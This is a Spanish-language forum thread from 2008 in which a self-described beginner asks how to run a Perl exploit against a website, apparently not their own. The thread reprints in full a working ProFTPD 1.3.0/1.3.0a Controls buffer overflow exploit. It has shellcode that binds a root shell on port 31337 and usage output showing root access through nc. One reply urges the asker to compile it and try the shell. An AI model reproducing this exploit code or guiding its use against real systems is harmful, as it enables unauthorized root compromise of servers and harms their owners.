una pregunta sobre exploit de perl

saludos, bueno disculpen la ignorancia, y si este tema ya fue tratado, pues perdonenme no lo e encontrado! :S este es mi punto, tengo una web con una vulnerabilidad que es:

ProFTPD Controls Module Local Buffer Overflow Vulnerability

en el puerto: 21

ahora tengo el exploit que es hecho en perl, ahora yo vi en un video que supuestamente te enseñaban a usarlo, que tenia que crear una carpeta asi por ejemplo:

C:\perl\bin

y metia mi exploit el code del exploit en un .txt y le ponia por ejemplo asi: exploit.pl

y que para ejecutarlo, me metia en el cmd ponia cd (enter) cd C:\PERL\BIN (enter) luego ponia: exploit.pl www.webAtakada.com y le daba a enter, ahora yo no tengo ningun compilador o el programa de perl en mi pc, necesito descargarlo para poder usar el exploit?

y otra cosa, esa es la manera correcta de ejecutar este exploit?

Bueno disculpen las molestias, pero es que soy nuevo y leo lo que puedo! Tongue

EDITADO: Si te sirven o les sirve, aqui dejo las vulnerabilidades que escanee hasta los momentos:

Salu2's!

cierto, disculpa Viper, fue una tonteria mia por no buscar bien! solo una cosa (que debio ser la verdadera pregunta) este exploit sirve con la primera vulnerabilidad que postte (que esta en amarillo) ya que lo encontre justo para esa!

Código:

#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a <bind_shell> as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6
# *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
#
# revenge @darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1
# [ wait some secs then nc on port 31337 ]
# anyone @anywhere:~$ nc <host> 31337
# id
# uid=0(root) gid=0(root) groups=50(ftp)
# exit
# [ after that server will deactivate ]
#
# Alfredo "revenge" Pesoli
#
# http://www.0xcafebabe.it/
# <revenge @0xcafebabe.it>
#

use strict;
use Socket;

if ( @ARGV < 2 ) { &usage(); }

my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x7a\x69\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

my $rsock = shift;
my $tn = shift;

my $ret;
my $nop = "\x90"x200;

use constant LSOCK => '/tmp/tmp.sock';

my %targets = (
'1' => "\x55\xef\xff\xbf" # Slackware 11.0
# Add here your target RET
);

my %tname = (
'1' => "Slackware 11.0"
);

$ret = $targets{$tn};

my $buffer = $nop.$hellcode.("$ret"x70);
my $l = length($buffer);

socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);

unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);

bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);

connect (SOCK, $rfile) or die "\nUnable to connect to ".$rsock."\nMaybe server is down or incorrect path\n\n";

print "\n Request length => ".$l."\n";
print " Target => ".$tname{$tn}."\n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;

close SOCK;

print "\n [#] Request sent - try to connect on port 31337\n\n";

sub usage() {
print "\n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ]\n";
print " Alfredo \"revenge\" Pesoli\n";
print " <revenge\ @0xcafebabe.it>\n\n";
print "Usage : $0 <path_to_unix_socket> <targets>\n";
print " Ex : $0 /usr/local/var/proftpd/proftpd.sock 1\n";
print "\n Available Targets :\n";
print " 1 => 0xbfffef55 (Slackware 11.0)\n\n";
exit();
}

si no me equivoco eso es perl, tu crees que sirva para esa vulnerabilidad? disculpa las molestias!

Salu2's! Cool

Eso parece, compilalo, pruébalo y nos cuentas como va esa shell por el 31337.

SAlud0s!

hola......... bueno Mancuertex disculpame la boberia y la tonta pregunta.............. pero como uso este exploit....... Huh

osea como "ataco" con el....................

mejor segui leendo ademas si queres compilar proFTPd tenes bajarte
"Active Perl"
busca manuales y navega con foro bas encontras tus repuesta
ese exploit se ejecuta con Dos
o sino fijate y aprende perl por que esta con errores ese exploit

saludos

Está bien que quieras ayudar CiberTron, pero date cuenta de la fecha del post Undecided

, la última respuesta fue Febrero 09, 2008. skullmaster-Back- ya ni está registrado en la web, el exploit estará antiguo y lo habrá compilado hace 3 o 4 meses Grin

Bueno ya aprobechando, para los que tengan dudas como él, ese post es bueno para aprender a compilar y para ver qué sistema usan los exploits, mirar la 1ª línea que generalmente lo pone"#!/usr/bin/perl -w" Wink

Cita de: CiberTron en Julio 07, 2008, 01:13:48

Normalmente cuando ejecutas el shell te dice Como funciona...Siempre trae sus propias instruciones, o me equivoko?

Eso es según el autor, algunos le pondrán dibujos, cuadros, texto o instrucciones y otros no le ponen nada Wink

Aunque generalmente traen las intrucciones.

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 24, 2008, 08:22:18 Boton Buscar